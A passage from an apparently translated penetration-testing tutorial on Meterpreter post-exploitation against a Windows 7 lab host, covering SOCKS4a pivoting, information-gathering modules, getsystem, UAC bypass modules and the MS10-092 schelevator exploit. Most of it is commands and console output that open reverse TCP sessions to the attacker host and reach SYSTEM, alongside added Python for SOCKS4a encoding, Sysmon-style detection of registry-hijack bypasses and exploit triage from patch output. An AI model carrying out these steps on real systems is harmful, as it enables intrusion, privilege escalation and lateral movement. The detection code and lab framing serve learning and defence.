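            chunks.append(d)
    return b"".join(chunks)


def demo() -> bytes:
    service = start_echo_server()
    # Bind the relay to loopback only. Meterpreter's default is 0.0.0.0 (see the output above),
    # which exposes the forwarded service to anyone who can reach the attacker host.
    relay = start_relay("127.0.0.1", 0, "127.0.0.1", service)
    return roundtrip(relay, b"hello through the relay\n")


if __name__ == "__main__":
    print(demo())
```

Each accepted client gets its own pair of pump threads, so several RDP clients can use the same relay at once, and half-closing with shutdown(SHUT_WR) rather than close() lets data still in flight in the other direction drain before the connection ends.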
SOCKS4a proxy

msf > use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run

Point proxychains at the listener and run tools through it:

~# gedit /etc/proxychains.conf
socks4 127.0.0.1 1080

~# proxychains nmap -sV 192.168.130.129
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-18 03:19 EST
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:135-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:135-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK
Nmap scan report for bogon (192.168.130.129)
Host is up (0.0027s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49154/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.08 seconds

The proxy only carries TCP connect() calls, so run nmap with -sT -Pn (full connect scan, no host discovery): the default SYN scan and ICMP probes use raw sockets that bypass proxychains and go out directly from the attacker host. SOCKS4a has no authentication, which is why srvhost is set to 127.0.0.1 rather than an external address. In current Metasploit the module is auxiliary/server/socks_proxy with VERSION set to 4a or 5.
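What proxychains and the socks4a server exchange for each of the |S-chain| lines above is a nine-byte-plus CONNECT request and an eight-byte reply. The block below is an added example, not Metasploit's code, that encodes and decodes both sides as the SOCKS4 and SOCKS4a protocol lays them out; the hosts and ports are constructed, and the 0.0.0.1 placeholder address is the protocol's own marker for "a hostname follows, resolve it on the proxy".

```python
"""The SOCKS4a CONNECT exchange that proxychains performs against auxiliary/server/socks4a.

Added example, not Metasploit's code: request and reply bytes as the SOCKS4/SOCKS4a
protocol lays them out. Sample hosts and ports are constructed.
"""
import ipaddress
import struct

CONNECT = 0x01
GRANTED, REJECTED = 0x5A, 0x5B
REPLY_TEXT = {0x5A: "request granted", 0x5B: "request rejected or failed",
              0x5C: "identd not reachable", 0x5D: "identd user-id mismatch"}


def build_connect(host: str, port: int, user_id: str = "") -> bytes:
    """Client side. An IPv4 literal uses plain SOCKS4; a hostname uses the SOCKS4a form,
    which sends DSTIP 0.0.0.1 and appends the NUL-terminated name for the proxy to resolve."""
    try:
        dst_ip, tail = int(ipaddress.IPv4Address(host)), b""
    except ipaddress.AddressValueError:
        dst_ip, tail = 0x00000001, host.encode("idna") + b"\x00"
    return struct.pack("!BBHI", 4, CONNECT, port, dst_ip) + user_id.encode() + b"\x00" + tail


def parse_request(data: bytes) -> dict:
    """Server side. Returns the target the proxy must connect to on the client's behalf."""
    if len(data) < 9 or data[0] != 4 or data[1] != CONNECT:
        raise ValueError("not a SOCKS4 CONNECT request")
    port, ip = struct.unpack("!HI", data[2:8])
    rest = data[8:]
    nul = rest.index(b"\x00")
    user_id, rest = rest[:nul].decode(), rest[nul + 1:]
    if ip >> 8 == 0 and (ip & 0xFF) != 0:          # 0.0.0.x: SOCKS4a, a hostname follows
        host = rest[:rest.index(b"\x00")].decode("idna")
    else:
        host = str(ipaddress.IPv4Address(ip))
    return {"host": host, "port": port, "user_id": user_id}


def build_reply(granted: bool, bind_ip: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    """Server side: the version byte is always 0 in replies."""
    return struct.pack("!BBHI", 0, GRANTED if granted else REJECTED,
                       bind_port, int(ipaddress.IPv4Address(bind_ip)))


def parse_reply(data: bytes) -> dict:
    """Client side: the 8-byte reply that decides whether the tunnel is open."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, port, ip = struct.unpack("!BBHI", data[:8])
    if vn != 0:
        raise ValueError(f"unexpected reply version {vn}")
    return {"granted": cd == GRANTED, "status": REPLY_TEXT.get(cd, "unknown"),
            "bind_port": port, "bind_ip": str(ipaddress.IPv4Address(ip))}


if __name__ == "__main__":
    # The first connection proxychains made above, as it looks on the wire.
    req = build_connect("192.168.130.129", 135)
    print(req.hex(), parse_request(req))
    print(parse_reply(build_reply(True)))
```

Nothing in either message authenticates the client: whoever can reach the proxy's srvhost:srvport gets a connection into the pivoted network, which is the reason the listener is bound to 127.0.0.1 above.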
Information gathering

There are many collection scripts; a few commonly used ones:

run post/windows/gather/checkvm                  # is the target a virtual machine?
run post/linux/gather/checkvm                    # the same, for Linux targets
run post/windows/gather/forensics/enum_drives    # list drives and partitions
run post/windows/gather/enum_applications        # installed software
run post/windows/gather/dumplinks                # recently opened files (from .lnk shortcuts)
run post/windows/gather/enum_ie                  # IE cache, history and saved data
run post/windows/gather/enum_chrome              # Chrome data
run post/windows/gather/enum_patches             # patch information
run post/windows/gather/enum_domain              # find the domain controller

meterpreter > run post/windows/gather/checkvm
[*] Checking if WIN-7 is a Virtual Machine .....
[+] This is a VMware Virtual Machine
meterpreter > run post/windows/gather/forensics/enum_drives
Device Name:            Type:   Size (bytes):
------------            -----   -------------
<Physical Drives:>
\\.\PhysicalDrive0              4702111234474983745
<Logical Drives:>
\\.\C:                          4702111234474983745
\\.\D:                          4702111234474983745
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on WIN-7

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  9.0.30729.6161
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  9.0.30729.6161

[+] Results stored in: /root/.msf4/loot/20181218215218_default_192.168.22.171_host.application_993878.txt
meterpreter > run post/windows/gather/dumplinks
[*] Running module against WIN-7
[*] Extracting lnk files for user Administrator at C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\...
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter > run post/windows/gather/enum_patches
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
meterpreter > run post/windows/gather/enum_domain
[+] FOUND Domain: uknowsec
[+] FOUND Domain Controller: WIN-0L310JHOGH6 (IP: 192.168.130.130)

The identical size values printed by enum_drives are obviously wrong (about 4.7 exabytes per drive) and should not be relied on; the device list itself is what the module is useful for. Note that enum_domain places the domain controller on the 192.168.130.0/24 network reached through the second NIC.
Privilege escalation

getsystem

getsystem

How getsystem works (technique 1, named pipe impersonation):

1. getsystem creates a new Windows service configured to run as SYSTEM; when started, the service connects to a named pipe.
2. getsystem spawns a process that creates that named pipe and waits for the service to connect.
3. The service starts and connects to the pipe.
4. The process accepts the connection and calls ImpersonateNamedPipeClient, which yields an impersonation token for SYSTEM.
5. Whatever then runs under that token (the cmd.exe this description spawns, or Meterpreter's own thread) runs with SYSTEM privileges.

Creating a service needs an elevated administrator token. From a medium-integrity session, even one belonging to a local administrator, all three techniques fail as shown below, and that is what the UAC bypass modules are for.

meterpreter > getuid
Server username: WIN-7\Win7
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

bypassuac

Metasploit ships several bypassuac modules. They work in different ways but are used the same way: each returns a new, high-integrity session, in which getsystem is run again to reach SYSTEM. For example:

msf exploit(windows/local/bypassuac_eventvwr) > search bypassuac

Matching Modules
================

   Name                                               Disclosure Date  Rank       Check  Description
   ----                                               ---------------  ----       -----  -----------
   exploit/windows/local/bypassuac                    2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   exploit/windows/local/bypassuac_comhijack          1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   exploit/windows/local/bypassuac_eventvwr           2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   exploit/windows/local/bypassuac_fodhelper          2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   exploit/windows/local/bypassuac_injection          2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   exploit/windows/local/bypassuac_injection_winsxs   2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   exploit/windows/local/bypassuac_sluihijack         2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   exploit/windows/local/bypassuac_vbs                2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)

meterpreter > background
[*] Backgrounding session 2...
msf exploit(multi/handler) > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 2
session => 2
msf exploit(windows/local/bypassuac) > run
[*] Started reverse TCP handler on 192.168.22.170:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (179779 bytes) to 192.168.22.171
[*] Meterpreter session 3 opened (192.168.22.170:4444 -> 192.168.22.171:59068) at 2018-12-18 22:12:04 -0500
meterpreter > getuid
Server username: WIN-7\Win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

msf exploit(windows/local/bypassuac) > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(windows/local/bypassuac_eventvwr) > set session 2
session => 2
msf exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 192.168.22.170:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (179779 bytes) to 192.168.22.171
[*] Meterpreter session 4 opened (192.168.22.170:4444 -> 192.168.22.171:59075) at 2018-12-18 22:25:01 -0500
[*] Cleaning up registry keys ...
meterpreter > getuid
Server username: WIN-7\Win7
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

All of these need the current user to be a local administrator with UAC at its default level; "Part of Administrators group!" and "UAC is set to Default" are exactly the two checks the modules perform, and a standard user or UAC set to "Always notify" stops them. The two runs also differ in footprint: the classic bypassuac uploads two executables to disk, while the eventvwr variant drops nothing. It writes the payload command under the current user's mscfile handler key (HKCU\Software\Classes\mscfile\shell\open\command), launches the auto-elevating eventvwr.exe, which consults that key, and deletes the key again ("Cleaning up registry keys"), so a later scan of the registry finds nothing and detection has to be event-driven.
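An event-driven check for the handler-hijack bypasses described above, as an added example that is not Metasploit's code or any product's rule. The records are constructed in the shape of Sysmon event fields (EventID 13, registry value set; EventID 1, process create) with placeholder SID and paths; the key paths are the ones the eventvwr (mscfile) and fodhelper (ms-settings) bypasses write under HKCU, and the parent/child rule flags an auto-elevating binary spawning anything other than its normal child.

```python
"""Event-driven detection of the registry-handler UAC bypasses (eventvwr, fodhelper).

Added example, not Metasploit's code or a vendor rule. SAMPLE_EVENTS is constructed
in the shape of Sysmon fields (EventID 13 = registry value set, EventID 1 = process
create); the SID and file paths are placeholders.
"""
import re
from typing import Dict, List

# Per-user handler keys that the auto-elevating binaries consult before launching.
HIJACK_KEY = re.compile(r"\\Software\\Classes\\(mscfile|ms-settings)\\shell\\open\\command$", re.I)
# Auto-elevating binaries and the child each legitimately spawns.
AUTO_ELEVATE = {"eventvwr.exe": {"mmc.exe"}, "fodhelper.exe": set()}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict[str, str]]) -> List[str]:
    """Return one alert string per suspicious event, in input order."""
    alerts = []
    for e in events:
        if e["EventID"] == "13" and HIJACK_KEY.search(e["TargetObject"]):
            # The write happens before the launch and the key is deleted afterwards,
            # so this is the moment to catch it.
            alerts.append(f"handler hijack staged by {e['Image']}: "
                          f"{e['TargetObject']} = {e['Details']}")
        elif e["EventID"] == "1":
            parent = _basename(e["ParentImage"])
            child = _basename(e["Image"])
            if parent in AUTO_ELEVATE and child not in AUTO_ELEVATE[parent]:
                alerts.append(f"{parent} spawned {child} at {e['IntegrityLevel']} integrity")
    return alerts


# Constructed sample: the eventvwr bypass as Sysmon would see it, plus benign noise.
SAMPLE_EVENTS = [
    {"EventID": "13", "Image": r"C:\Users\Win7\Desktop\shell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1000\Software\Classes\mscfile\shell\open\command",
     "Details": r"C:\Users\Win7\AppData\Local\Temp\stager.exe"},
    {"EventID": "13", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1000\Software\Classes\.txt",
     "Details": "txtfile"},
    {"EventID": "1", "Image": r"C:\Users\Win7\AppData\Local\Temp\stager.exe",
     "ParentImage": r"C:\Windows\SysWOW64\eventvwr.exe", "IntegrityLevel": "High"},
    {"EventID": "1", "Image": r"C:\Windows\System32\mmc.exe",
     "ParentImage": r"C:\Windows\System32\eventvwr.exe", "IntegrityLevel": "High"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print("ALERT:", a)
```

The two rules fire independently: the registry write identifies the process that staged the hijack even if the launch never happens, and the process-create rule catches the elevated child even if registry auditing is not enabled.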
Kernel exploit privilege escalation

Collect the patch state with the enum_patches module first, then look for a matching local exploit.

meterpreter > run post/windows/gather/enum_patches   # show patch information
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1

The module only checks whether the named KB is installed, hence "Possibly vulnerable": a later rollup may contain the same fix, and the "if" clause has to match the target. Here the host is x64 Windows 7 (see sysinfo), which rules out the three x86-only entries and the XP/2003 one and leaves MS10-092 (schelevator, a Task Scheduler flaw).

msf exploit(multi/handler) > use exploit/windows/local/ms10_092_schelevator
msf exploit(windows/local/ms10_092_schelevator) > set session 5
session => 5
msf exploit(windows/local/ms10_092_schelevator) > run
[*] Started reverse TCP handler on 192.168.22.170:4444
[*] Preparing payload at C:\Users\Win7\AppData\Local\Temp\IsamdcUIQQzv.exe
[*] Creating task: lk6j4xdPvbMB
[*] SUCCESS: The scheduled task "lk6j4xdPvbMB" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\lk6j4xdPvbMB...
[*] Original CRC32: 0xd75a78d9
[*] Final CRC32: 0xd75a78d9
[*] Writing our modified content back...
[*] Validating task: lk6j4xdPvbMB
[*] ERROR: (schtasks message, garbled in the original capture)
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "lk6j4xdPvbMB" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "lk6j4xdPvbMB" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] SUCCESS: Attempted to run the scheduled task "lk6j4xdPvbMB".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Sending stage (179779 bytes) to 192.168.22.171
[*] SUCCESS: The scheduled task "lk6j4xdPvbMB" was successfully deleted.
[*] SCHELEVATOR
[*] Meterpreter session 6 opened (192.168.22.170:4444

The schtasks messages were printed in the target's Chinese locale and are given here in their English form. The matching "Original CRC32" and "Final CRC32" lines are the point of the exploit: the task's XML is rewritten to run the payload as SYSTEM and padded so that its CRC32, the only integrity check the Task Scheduler applied to task files, is unchanged. Note also the dropped payload under the user's Temp directory, a footprint that in-memory techniques avoid.
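Reading enum_patches output by hand is how the author arrived at schelevator; the block below does the same triage programmatically. It is an added example, not Metasploit's code, and it serves both the enum_patches run in the information-gathering section and its reuse for exploit selection here. The input is the module's output exactly as printed on this page; the module-name mapping follows the exploit/windows/local/msYY_NNN_<name> convention that the listed modules use and should be confirmed with `search` in msfconsole, and the applicability filter is a text heuristic over the module's remarks, not a vulnerability check.

```python
"""Turn enum_patches output into records and shortlist exploits for the host seen in sysinfo.

Added example, not Metasploit's code. ENUM_PATCHES_OUTPUT is the module output printed
on this page; the module-path mapping is the msYY_NNN_<name> naming convention the
listed modules follow (confirm with `search`), and candidates() is a text heuristic.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

ENUM_PATCHES_OUTPUT = """\
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
"""

MISSING = re.compile(r"^\[\+\] (KB\d+) is missing$")
VULN = re.compile(r"^\[\+\] (KB\d+) - Possibly vulnerable to (MS\d{2}-\d{3}) (\w+)(?:,? (?:if )?(.*))?$")


@dataclass
class Finding:
    kb: str
    bulletin: Optional[str]   # None for a bare "is missing" line
    name: Optional[str]
    note: str                 # the "if ..." condition or other remark, "" if none

    @property
    def module(self) -> Optional[str]:
        """exploit/windows/local/msYY_NNN_<name>, the convention the listed modules follow."""
        if not self.bulletin:
            return None
        yy, nnn = self.bulletin[2:].split("-")
        return f"exploit/windows/local/ms{yy}_{nnn}_{self.name}"


def parse_enum_patches(text: str) -> List[Finding]:
    findings = []
    for line in text.splitlines():
        m = MISSING.match(line)
        if m:
            findings.append(Finding(m.group(1), None, None, ""))
            continue
        m = VULN.match(line)
        if m:
            kb, bulletin, name, note = m.groups()
            findings.append(Finding(kb, bulletin, name, note or ""))
    return findings


def candidates(findings: List[Finding], os_token: str, arch: str) -> List[Finding]:
    """Keep findings whose remark names this OS version and, on an x64 host, is not x86-only.
    A heuristic over the module's free-text remarks, not a vulnerability check."""
    os_re = re.compile(rf"(?<!\d){re.escape(os_token)}(?!\d)")   # "7" in "Windows 7", "Win7", "7,"
    out = []
    for f in findings:
        if not f.bulletin:
            continue
        if arch == "x64" and "x86" in f.note:
            continue
        if os_re.search(f.note):
            out.append(f)
    return out


if __name__ == "__main__":
    found = parse_enum_patches(ENUM_PATCHES_OUTPUT)
    # sysinfo above: Windows 7, x64
    for f in candidates(found, os_token="7", arch="x64"):
        print(f.bulletin, f.module, "-", f.note)
```

For the x64 Windows 7 host in this post the shortlist is exactly MS10-092 (exploit/windows/local/ms10_092_schelevator); the same output on an x86 Windows 7 host would also keep kitrap0d, schlamperei and track_popup_menu. Two caveats remain outside the heuristic: the "is missing" lines carry no exploit name, and several local exploit modules refuse to run from a WOW64 session such as the x86 Meterpreter on this x64 host, so the session architecture matters as much as the patch level.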